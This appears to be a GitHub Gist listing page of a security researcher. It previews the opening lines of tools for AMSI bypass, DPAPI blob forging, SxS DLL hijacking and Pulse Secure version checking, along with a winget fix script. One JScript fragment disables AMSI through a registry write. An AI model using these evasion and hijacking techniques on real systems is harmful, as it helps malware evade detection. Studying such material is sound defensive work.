Rich Warren rxwx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import re | |
| HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"} | |
| if len(sys.argv) != 2: | |
| print " Usage: python pulseversion.py <target ip/domain>" | |
| sys.exit(1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var sh = new ActiveXObject('WScript.Shell'); | |
| var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; | |
| try{ | |
| var AmsiEnable = sh.RegRead(key); | |
| if(AmsiEnable!=0){ | |
| throw new Error(1, ''); | |
| } | |
| }catch(e){ | |
| sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| #include "VEH.h" | |
| #include "ntos.h" | |
| #include "ntrtl.h" | |
| //#include "peb.h" | |
| #include "ntldr.h" | |
| #include "hwbp.h" | |
| #include "base\helpers.h" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <iostream> | |
| #include <fstream> | |
| #include <amsi.h> | |
| #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) | |
| #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) | |
| // https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/ | |
| typedef struct tagHAMSICONTEXT { |
rxwx
/ AmsiContextHook.cpp
Created
November 30, 2023 17:04
Bypass AMSI on Windows 11 by hooking the AMSI context VTable on the heap with a ROP gadget. Look ma, no code patches!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <metahost.h> | |
| #include <comutil.h> | |
| #include <mscoree.h> | |
| #include "patch_info.h" | |
| #include "base\helpers.h" | |
| /** | |
| * For the debug build we want: |
rxwx
/ encrypt_dpapi_blob.py
Created
August 29, 2024 10:46
Encrypt a DPAPI blob with arbitrary master key (using Python)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Crypto.Cipher import AES, DES3 | |
| from Crypto.Hash import HMAC, SHA1, SHA512, SHA256 | |
| from Crypto.Util.Padding import pad | |
| from io import BytesIO | |
| import argparse | |
| import string | |
| import base64 | |
| import uuid | |
| import os |
rxwx
/ winget-fix-alt.ps1
Last active
February 19, 2025 14:38
Install winget in Windows Sandbox (fix)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # fix wmi | |
| winmgmt /resetrepository | |
| Restart-Service Winmgmt | |
| Get-CimInstance -Namespace root/cimv2 -ClassName Win32_PingStatus -Filter "Address='www.microsoft.com'" | |
| # alternative method: set high bandwidth limit for Delivery Optimization | |
| reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadMode" /t REG_DWORD /d 0 /f | |
| reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadModeProvider" /t REG_DWORD /d 8 /f | |
| reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadRateBackgroundBps" /t REG_DWORD /d 4294967295 /f | |
| reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadRateBackgroundBpsProvider" /t REG_DWORD /d 8 /f |
rxwx
/ loadBundle.js
Last active
December 18, 2024 01:45
Mach-O Loader in Node.js (work in progress)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const ffi = require('ffi-napi'); | |
| const ref = require("ref-napi"); | |
| const Struct = require("ref-struct-di")(ref); | |
| const fs = require('fs') | |
| const ArrayType = require('ref-array-napi') | |
| var Union = require('ref-union-napi'); | |
| /* | |
| Dependencies: | |
| $ npm install ffi-napi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import os | |
| import sys | |
| import struct | |
| import binascii | |
| from Crypto.Cipher import AES | |
| IV = binascii.unhexlify("0A254C2FE7AE0B7047028D6B4B2E6944") | |
| AES_KEY = binascii.unhexlify("FE4C8C32FBAE1AF3C4A0ABC8E1866CAD") |
rxwx
/ GetSxsPath.cs
Created
July 3, 2023 12:43
Determine redirection path for SxS DotLocal DLL Hijacking
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using static GetSxsPath.NativeMethods; | |
| namespace GetSxsPath | |
| { | |
| internal class NativeMethods |
NewerOlder